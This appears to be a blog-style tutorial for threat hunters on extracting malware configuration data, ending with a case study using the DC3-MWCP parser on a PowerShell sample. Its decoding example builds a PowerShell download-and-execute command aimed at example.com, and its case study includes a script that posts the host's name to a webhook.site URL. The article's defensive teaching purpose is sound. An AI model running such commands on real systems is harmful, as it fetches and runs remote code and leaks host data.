The majority of threat actors buy and use commodity malware. To tailor this malicious software to their needs, they use malware configuration settings that dictate how it behaves. Parsing this data is an essential skill for any threat hunter or detection engineer, which makes learning to use malware configuration parsers vital.
Malware configuration parsing allows you to correlate intrusions, track campaigns, enrich threat hunts, improve incident response, and write better detection rules. It is a skill often overlooked due to its technical requirements, but with malware configuration parsing tools, you can add this game-changing analysis skill to your arsenal.
This article will show you how. You will learn why malware configuration parsing is vital for defenders, the different parsing options available, and the challenges you will face. You will also see a practical example of how to parse PowerShell malware. Let’s jump in and get started!
A Brief Guide on Malware Configuration
There are around 5.5 billion malware (malicious software) attacks every year. Malware is used to gain initial access, move around networks, automatically exploit vulnerabilities, ransom victims, and exfiltrate data. It automates a human operator’s actions, making them more efficient, scalable, and less error-prone.
However, to be effective, malware needs to meet specific user needs. It needs to be able to exfiltrate data to a certain network address, install a persistence mechanism in a certain location, or only target certain victims. Malware authors must allow users to fine-tune the commodity malware they sell, which is where malware configuration comes in.
Like any other software, malware can be configured to behave, function, or interact in a certain way using parameters, settings, or a set of rules. You can instruct the malware to communicate with a specific IP address on a specific port at a specific time once it has infected a system without having to build your own custom malware (a resource-intensive process).
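As a rough illustration, the kind of settings described above could be modeled as a small data structure. This is only a sketch: the class name, field names, and values are hypothetical and are not taken from any real malware family.

```python
from dataclasses import dataclass, asdict


@dataclass
class MalwareConfig:
    """Hypothetical configuration record; every field name is illustrative."""
    c2_address: str         # where the malware calls home
    c2_port: int            # which port it connects to
    beacon_interval_s: int  # how often it checks in, in seconds
    install_path: str       # where it copies itself on the victim
    mutex: str              # marker used to avoid running twice on one host


# Example values only; the IP comes from a range reserved for documentation.
config = MalwareConfig(
    c2_address="203.0.113.10",
    c2_port=8443,
    beacon_interval_s=300,
    install_path=r"C:\Users\Public\updater.exe",
    mutex="Global\\ExampleMutex01",
)

# A parser's job is essentially to recover a record like this from a sample.
print(asdict(config))
```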
Here are some main reasons threat actors will configure the malware they use:
- Adapt to changing circumstances, evade detection, or update its capabilities in response to security measures. This can even be done dynamically with polymorphic malware that alters its behavior over time or in response to environment variables.
- Tailor the malware to their use case, infrastructure, and objective. For instance, changing communication settings, adjusting the payload delivery mechanism, or adding a persistence mechanism.
- Add encryption and obfuscation to hinder analysis. Attackers will often configure malware with their own encryption key to protect it, or the data it is exfiltrating, from detection and analysis.
- Obscure IOCs. Detection rules can be created to pick up default malware configurations, such as mutexes, so attackers will adjust default settings to evade detection.
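To make the encryption point above concrete, here is a minimal sketch of recovering a configuration that has been protected with a repeating-key XOR. It assumes the key is already known and that the configuration is stored as JSON. Both are simplifying assumptions, and the key and values are invented for the example. Real samples often use stronger ciphers and hide the key.

```python
import json


def xor_bytes(data: bytes, key: bytes) -> bytes:
    """Apply a repeating-key XOR; the same call both encodes and decodes."""
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))


# Hypothetical key chosen by the malware user.
key = b"k3y"

# Simulate the blob that would be embedded in a sample.
plain = json.dumps({"c2": "198.51.100.7", "port": 443}).encode()
blob = xor_bytes(plain, key)

# Recovering the configuration is the same operation with the same key.
decoded = json.loads(xor_bytes(blob, key))
print(decoded)
```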
You may wonder why threat actors don’t just write their own malware. Writing custom malware that can evade modern security controls is a time-intensive and skill-dependent process. Most threat actors choose to buy malware-as-a-service (MaaS) from affiliate programs.
Why Parse Malware Configurations?
So why parse the configuration data in a piece of malware? Simple: to better understand both the malware and the threat actor behind it.
Parsing the embedded configuration details in a piece of malware plays a crucial role in quickly understanding its behavior and interpreting the threat actor’s objectives. These details allow defenders to hunt for threats, build detections, and group similar intrusions into campaigns to gain insight into an adversary’s capabilities, intentions, and future actions.
Even something as simple as changing the default installation folder or the persistence mechanism can tell you something about the adversary, give you something to hunt for, and allow you to correlate intrusions.
Here are some examples of information you can extract from malware configuration data. You can use this data to hunt using the Indicator Lifecycle, write detection rules, or enrich your intelligence. The Course of Action (CoA) you choose will depend on your intelligence requirements, tools, logging capabilities, and the type of information. For example, hunting for atomic indicators like IP addresses or hashes is better than building a detection rule around them.
Registry values and keys
These are components of the Microsoft Windows registry, a hierarchical database that stores configuration settings and options for the operating system and installed applications. Malware will install persistence mechanisms in this database. Extracting this data can help guide incident response or threat hunting efforts.
Domains, IP addresses, network ports, and user agents
Malware often communicates back to the attacker and has network information coded into it. Extracting this data can help you find additional IOCs to block or hunt for in your environment.
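A simple way to picture this extraction is a pass over the strings recovered from a sample. The sketch below uses regular expressions from the Python standard library and validates IP candidates with the ipaddress module. The input text is made up, and the patterns are deliberately loose, so treat it as a starting point rather than a complete extractor.

```python
import ipaddress
import re

IPV4_RE = re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}\b")
URL_RE = re.compile(r"https?://[^\s'\"<>]+", re.IGNORECASE)


def extract_network_iocs(text: str) -> dict:
    """Return validated IPv4 addresses and URLs found in free text."""
    ips = set()
    for candidate in IPV4_RE.findall(text):
        try:
            ips.add(str(ipaddress.ip_address(candidate)))
        except ValueError:
            pass  # looks like an IP but is not valid, e.g. 999.1.1.1
    urls = set(URL_RE.findall(text))
    return {"ips": sorted(ips), "urls": sorted(urls)}


# Hypothetical strings pulled from a sample.
sample_strings = (
    "connect 203.0.113.5:4444 then GET http://example.com/gate.php "
    "ua=Mozilla/5.0 ver 999.1.1.1"
)
iocs = extract_network_iocs(sample_strings)
print(iocs)
```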
Filenames and file paths
Malware is usually deployed in stages. An initial stage (dropper/loader) will download other components to provide additional functionality and capabilities. The malware will store these additional components somewhere on the victim’s filesystem. Extracting filenames and file paths from the malware configuration details can help you find these installation locations.
Version numbers
Malware variants usually undergo iterations where the author adds or improves their functionality, just like traditional software development. This means samples often contain version numbers that can be parsed and analyzed against other samples or threat intelligence, allowing you to deduce the malware’s capabilities or IOCs.
Commands executed
Malware can be configured to execute specific commands once it infects a machine. Extracting these commands (or fragments of them) from the malware configuration data can allow you to identify other malicious behaviors and even the intent of the malware.
Mutexes
Legitimate software uses mutex objects as a locking mechanism to prevent multiple threads from accessing the same resource. Malware authors use mutexes for a similar reason, typically to stop a second copy of the malware from running on a host that is already infected. This creates identifiers in malware samples that you can extract to identify a malware family or variant.
Key Advantages of Parsing Malware Configurations
- Correlate intrusions and help track campaigns: The configuration of malware can be used to correlate separate intrusions into an overarching campaign. By classifying an intrusion into a campaign, defenders can identify other behaviors, IOCs, or targets associated with that campaign.
- Enrich threat hunting: Configuration data can be used to generate threat hunting hypotheses based on malware indicators or behavior. This can guide threat hunters to find malware lurking in their environment undetected or enrich existing threat hunts.
- Improve incident response: Malware configuration data often contains key indicators (IOCs). These can help incident responders know what to look for on infected systems, remove persistence mechanisms, and identify when data has been exfiltrated.
- Better detection engineering: Analyzing the behavior of malware through its configuration data allows you to build more robust detections focusing on behavioral patterns and functionality rather than atomic indicators.
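The correlation idea in the first point above can be sketched in a few lines: group samples that share a configuration value. The sample names and values below are hypothetical, and a shared value is only a lead to investigate, not proof that two intrusions belong to the same campaign.

```python
from collections import defaultdict

# Hypothetical parsed configurations keyed by sample name.
parsed = {
    "sample_a": {"c2": "c2.example.net", "mutex": "mtx_alpha"},
    "sample_b": {"c2": "c2.example.net", "mutex": "mtx_beta"},
    "sample_c": {"c2": "other.example.org", "mutex": "mtx_gamma"},
}


def group_by_field(configs: dict, field: str) -> dict:
    """Map each value of `field` to the samples sharing it (two or more)."""
    groups = defaultdict(list)
    for name, cfg in configs.items():
        if field in cfg:  # skip samples where the field was not extracted
            groups[cfg[field]].append(name)
    return {value: sorted(names) for value, names in groups.items() if len(names) > 1}


clusters = group_by_field(parsed, "c2")
print(clusters)
```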
Now you know the why, let’s look at the how by exploring tools that allow us to parse malware efficiently.
Using Malware Configuration Parsers
Parsing malware is difficult. You must know how to dive into the binary file and perform reverse engineering to pull out all the embedded configuration data. This is time-intensive and requires expert knowledge and mastery of complex tools. A better option for many of us is to use a malware parser and automate the process.
Malware configuration parsers are tools designed to automatically extract, interpret, and analyze the configuration settings embedded in malware. There is no need to spend time painstakingly dissecting a piece of malware to uncover configuration details. Just find (or build) a parser to match the piece of malware you are investigating, run the tool, and feast on the configuration details it reveals.
Common Features and Capabilities
Malware configuration parsers have several features and capabilities in common. Consider these when looking for one to use or when building your own.
- Configuration and IOC extraction: All malware parsers are designed to extract relevant configuration settings and IOCs, including network communication data, filenames and hashes, encryption keys, and more.
- Decryption and deobfuscation: Many parsers can dynamically decrypt or deobfuscate hidden configuration details, particularly ones that dynamically analyze the malware.
- Adaptability: Some malware config parsers can adapt to different malware families or variants, whereas others are specifically designed to extract configuration settings from one type of malware or even just one variant.
- Behavioral analysis: Malware configuration parsers can be built into larger malware analysis tools like sandbox environments. These tools can automate the dynamic analysis of malware once executed and provide details about its configuration based on how it behaves.
- Integration with other tools: To help streamline your investigations, it can be useful if your parser integrates with other tools. This could be through inbuilt integrations into a SIEM solution and Threat Intelligence Platform (TIP), or custom-built integrations if the tool supports an API and scripting language like Python.
- Automation and scalability: If you plan to analyze large quantities of malware, finding a tool to support volume and automated analysis is useful. Many all-in-one malware analysis solutions support this functionality but for a premium.
- Visualization and reporting: Several malware configuration parsers include visualizations and reporting capabilities to help you understand their findings effectively. This is a nice feature to have but not necessary for investigatory purposes.
A malware configuration parser may not support all these features. That does not make it a bad tool. For instance, one parser may be great at creating visual reports and able to parse configuration data from various malware, whereas another may be very good at parsing one specific type of malware. It is useful to build up a collection of malware config parsers to use on a case-by-case basis.
Commodity vs. Custom Parsers
You can choose from two types of malware configuration parsers: off-the-shelf commodity parsers or custom parsers that you build yourself.
Commodity Parsers
When first starting out with parsing malware configs, it is useful to try out commodity parsers. These tools often don’t require you to have a deep understanding of system programming or malware analysis. Instead, they are point-and-shoot solutions that only require you to upload a malware sample or run a command line tool.
Many popular malware analysis tools like ANY.RUN, Intezer Analyze, and VMRay include malware configuration parsers as part of their all-in-one package. There are also open-source solutions like MalCfgParser, which brute forces malware config details and can be extended using YARA and malware configuration structs.
Custom Parsers
If commodity parsers don’t cut it, you will need to build your own custom parser. You can do this by hand, going through a malware binary, picking out configuration settings, and then coding a tool to do this for you in a reverse engineering suite like Ghidra, IDA Pro, or Binary Ninja. But there is an easier way.
The US Department of Defense (DoD) Cyber Crime Center has created a project called DC3 Malware Configuration Parser (DC3-MWCP). This framework for parsing malware configuration information is designed to make building and sharing malware parsers easier. It is an awesome project that supports individual analysis of singular malware samples and large-scale automated analysis of many samples. I highly recommend starting here when building a custom parser.
The framework also comes with many inbuilt malware configuration parsers that you will see in action later.
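For comparison, the hand-coded approach mentioned above might look something like the following sketch. It does not use the DC3-MWCP API. It assumes a hypothetical malware family that stores its configuration after a CFG1 marker in a fixed binary layout (IPv4 address, port, null-padded mutex name). The marker, layout, and function names are all invented for illustration.

```python
import socket
import struct

MARKER = b"CFG1"  # hypothetical marker preceding the config block
# Assumed layout: 4-byte IPv4, 2-byte big-endian port, 16-byte null-padded mutex.
LAYOUT = struct.Struct(">4sH16s")


def identify(data: bytes) -> bool:
    """Cheap check that this parser applies to the sample."""
    return MARKER in data


def parse_config(data: bytes) -> dict:
    """Unpack the fixed-layout config that follows the marker."""
    start = data.index(MARKER) + len(MARKER)
    raw_ip, port, raw_mutex = LAYOUT.unpack_from(data, start)
    return {
        "c2_ip": socket.inet_ntoa(raw_ip),
        "c2_port": port,
        "mutex": raw_mutex.rstrip(b"\x00").decode("ascii"),
    }


# Build a fake "binary" so the sketch can run without a real sample.
fake_sample = (
    b"\x90" * 8
    + MARKER
    + LAYOUT.pack(socket.inet_aton("192.0.2.44"), 4444, b"demo_mutex")
    + b"\x00" * 4
)

if identify(fake_sample):
    result = parse_config(fake_sample)
    print(result)
```

Splitting the work into an identification step and an extraction step keeps each family-specific parser small, which is the kind of structure a framework can then standardize and share.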
Challenges in Parsing Malware Configurations
At this point, you probably recognize the value of malware parsers and are avidly researching tools you can use or even considering building your own! Unfortunately, parsing malware configuration data is not without its challenges. Here are some you will come across.
Anti-Analysis Techniques
Malware authors don’t want analysts poking around at their malware and writing detections for it. They will use various anti-analysis techniques to prevent this, including encryption, obfuscation, sandbox/debugger detection, delays in execution, packing, and more. This makes parsing malware configuration data difficult, often requiring a custom tool to extract data for each malware family or variant.
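One of the simpler obfuscation layers you will meet in PowerShell malware is the -EncodedCommand argument, which carries a Base64-encoded, UTF-16LE script. The sketch below reverses that single layer. The command line is constructed for the example, the function name is hypothetical, and real samples frequently stack further layers (compression, string concatenation, additional encodings) on top.

```python
import base64
import re

# Matches common spellings of the argument (-e, -ec, -enc, -EncodedCommand).
ENC_RE = re.compile(
    r"(?<!\S)-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)",
    re.IGNORECASE,
)


def decode_encoded_command(command_line: str):
    """Return the decoded script, or None if no encoded argument is present."""
    match = ENC_RE.search(command_line)
    if not match:
        return None
    return base64.b64decode(match.group(1)).decode("utf-16-le")


# Build an example command line the same way PowerShell expects it.
original = "IEX (New-Object Net.WebClient).DownloadString('http://example.com/a')"
encoded = base64.b64encode(original.encode("utf-16-le")).decode("ascii")
cmdline = f"powershell.exe -NoProfile -EncodedCommand {encoded}"

print(decode_encoded_command(cmdline))
```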
Volume and Variety
The sheer volume and variety of malware make it difficult to build one malware configuration parser to handle everything. Each malware family or variant will have unique characteristics, target different operating systems, and use different anti-analysis techniques. Creating one tool that can accommodate all of this diversity is incredibly hard, if not impossible. This is why you see malware configuration parsers designed for specific malware.
A solution to this problem is to use a sandbox environment that executes the malware and analyzes its behavior to deduce its configuration settings. However, malware authors will try to circumvent this with anti-sandbox techniques. There is an ongoing battle between malware analysts and authors to bypass anti-analysis techniques and implement new ones.
Resource Constraints
Parsing malware configuration settings can be very easy or very hard. There is usually no in-between. If there is an existing malware parser for the malware sample you are analyzing, your job is easy; just run the tool against your sample.
On the other hand, if a malware parser does not exist for your sample, much more work is needed. You must analyze or reverse engineer the sample by yourself to extract the data, then code a tool that automates your actions. This is a resource-intensive process, and often you will not have the time or skill to do this.
Ideally, you will have a malware analyst or reverse engineer on your team who can do this for you. But even then, this may not be possible to complete in a satisfactory time scale, depending on the sophistication of the malware.
Case Study: DC3-MWCP
Enough theory. Let’s see a malware configuration parser in action! In this case study, we will use the DC3-MWCP project’s default PowerShell parser to investigate a suspicious PowerShell script we found on a system. Our aim is to provide valuable insights to help our security operations team.
Installation
To begin, you first need to install the DC3-MWCP tool. You can install the tool directly using Python’s PIP package manager with the command pip install mwcp. Alternatively, you can clone the project’s GitHub repository and then use PIP. Both options require Python to be installed first.
# option 1
pip install mwcp
# option 2
git clone https://github.com/Defense-Cyber-Crime-Center/DC3-MWCP.git
pip install ./DC3-MWCP
Now you can move on to the fun part!
Usage
DC3-MWCP comes pre-packaged with several parsers you can use. To see what is available, run the DC3-MWCP command line tool by executing mwcp list. This lists the available loaded parsers.
In this case, 11 malware parsers are available out of the box. You can reference these built-in parsers from your own parser configuration by prepending dc3: to the parser name, as in this example:
SuperMalware:
    description: SuperMalware component
    author: acme
    parsers:
        - dc3:Archive.Zip
        - .Dropper
        - .Implant
        - dc3:Decoy
You may need to add your local binary directory $HOME/.local/bin to your system’s $PATH variable if the command above does not work as expected.
To see what else the DC3-MWCP command line tool can do, execute the command mwcp --help. This brings up the help manual.
Let’s try out the parse option. This lets us run any available parser against a malware sample to extract configuration settings. In our investigation, we came across some PowerShell malware that needs to be investigated. This malware has been renamed to sample1.ps1 and can be analyzed with the following command:
mwcp parse PowerShell sample1.ps1
Here you use the default PowerShell parser. You can see it extracted a URL, protocol, and domain name from the sample. These would have been set as configuration options by the malware user. Extracting them can help in our investigation.
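To get a feel for what this kind of extraction involves, here is a small standard-library sketch that pulls URLs out of script text and splits each one into the same three fields. It is not how the DC3-MWCP PowerShell parser is implemented. The script content, including the placeholder path on webhook.site, is invented for the example.

```python
import re
from urllib.parse import urlsplit

URL_RE = re.compile(r"https?://[^\s'\"`)]+", re.IGNORECASE)


def summarize_urls(script_text: str) -> list:
    """Return url, protocol, and domain for each unique URL in the text."""
    results = []
    for url in sorted(set(URL_RE.findall(script_text))):
        parts = urlsplit(url)
        results.append(
            {"url": url, "protocol": parts.scheme, "domain": parts.hostname}
        )
    return results


# Hypothetical script content standing in for the real sample.
script = '''
$u = "https://webhook.site/00000000-0000-0000-0000-000000000000"
Invoke-WebRequest -Uri $u -Method POST -Body $env:COMPUTERNAME
'''

findings = summarize_urls(script)
print(findings)
```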
Analyzing Configuration Details
Once you extract configuration settings, you can then move on to analyzing them. At this point, you have some network indicators to hunt for or pivot from. To hunt for these indicators, hop on your organization’s SIEM or EDR tool and run threat hunting queries. For instance, what other systems communicated to this domain in the last week?
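The logic behind such a hunting query can be sketched in plain Python. In practice you would write this in your SIEM or EDR query language. The log records, host names, field names, and fixed reference date below are all hypothetical.

```python
from datetime import datetime, timedelta, timezone

# Fixed reference time so the example is reproducible.
NOW = datetime(2024, 1, 15, tzinfo=timezone.utc)

# Hypothetical proxy log records; a real hunt would query your SIEM or EDR.
records = [
    {"host": "ws-014", "domain": "webhook.site", "time": NOW - timedelta(days=2)},
    {"host": "ws-101", "domain": "webhook.site", "time": NOW - timedelta(days=12)},
    {"host": "srv-02", "domain": "example.com", "time": NOW - timedelta(days=1)},
    {"host": "ws-014", "domain": "webhook.site", "time": NOW - timedelta(hours=3)},
]


def hosts_contacting(records, domain, now, days=7):
    """Return the unique hosts that contacted `domain` within the last `days`."""
    cutoff = now - timedelta(days=days)
    return sorted(
        {r["host"] for r in records if r["domain"] == domain and r["time"] >= cutoff}
    )


recent_hosts = hosts_contacting(records, "webhook.site", NOW)
print(recent_hosts)
```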
If you choose to pivot on this data point, using the indicator lifecycle, you can use a tool like VirusTotal to find other related data points to investigate. Searching for webhook.site in VirusTotal reveals that it is potentially a malicious domain.
The domain has also popped up in several threat intelligence reports.
The reports indicate adversaries frequently abuse the domain because it is short, inconspicuous, and blends into legitimate network traffic. This malware sample is likely related to the activity described in the latest threat intel report, but further investigation is needed to confirm this. A good place to start doing this is the Relations tab in VirusTotal. It provides other indicators you can look for in your environment.
You can now write up a working intelligence report on what you have discovered about this malware sample based on its configuration data. A good tool to do this with is CTI Blueprints, a project from MITRE that makes intelligence reporting easy.
Conclusion
The majority of malware seen today is commodity MaaS sold by cybercriminals. Threat actors buy this malware and configure it for their attacks. Extracting this configuration data is a vital skill that allows you to enrich threat intelligence, guide threat hunts, and build better detections.
However, parsing malware configuration information is difficult. It is time-intensive and requires a great deal of technical skill. An easier option is to use a malware configuration parser like DC3-MWCP. This tool allows you to use inbuilt parsers or build your own using its framework. The case study in this article showcased some of this tool’s capabilities, but I highly recommend exploring this tool further and integrating it into your threat intelligence, threat hunting, and detection engineering processes.
Don’t just track malware. Track malware configuration data to paint a more accurate picture of your adversary!
Frequently Asked Questions
What is Malware Configuration?
Malware can be configured to behave, function, or interact in a certain way. Often malware authors will allow users to configure the malware to suit their use case. This includes adjusting settings like where to exfiltrate data, changing parameters like the default installation folder, or adding rules that guide the malware’s actions, such as looking for a certain sensitive file. Giving users the ability to configure malware allows the authors to sell their malware to a wider audience, turning it into a commodity (Malware-as-a-Service).
What Are Malware Configuration Parsers?
Malware configuration parsers are tools designed to extract, interpret, and analyze the configuration settings embedded in malware. They are used by malware analysts, CTI analysts, and incident responders to uncover the specific instructions, parameters, and details that define the behavior and functionality of the malware. This information allows them to hunt for IOCs in their environment and group similar intrusions (attacks) into campaigns to gain insight into an adversary’s capabilities, intentions, and future actions.
How Can I Use a Malware Configuration Parser?
You can get started using malware configuration parsers right now for free! Head to the Department of Defense (DoD) Cyber Crime Center DC3 Malware Configuration Parser (DC3-MWCP) GitHub page. This project provides a framework for building your own malware configuration parser and includes several built-in parsers to get started with.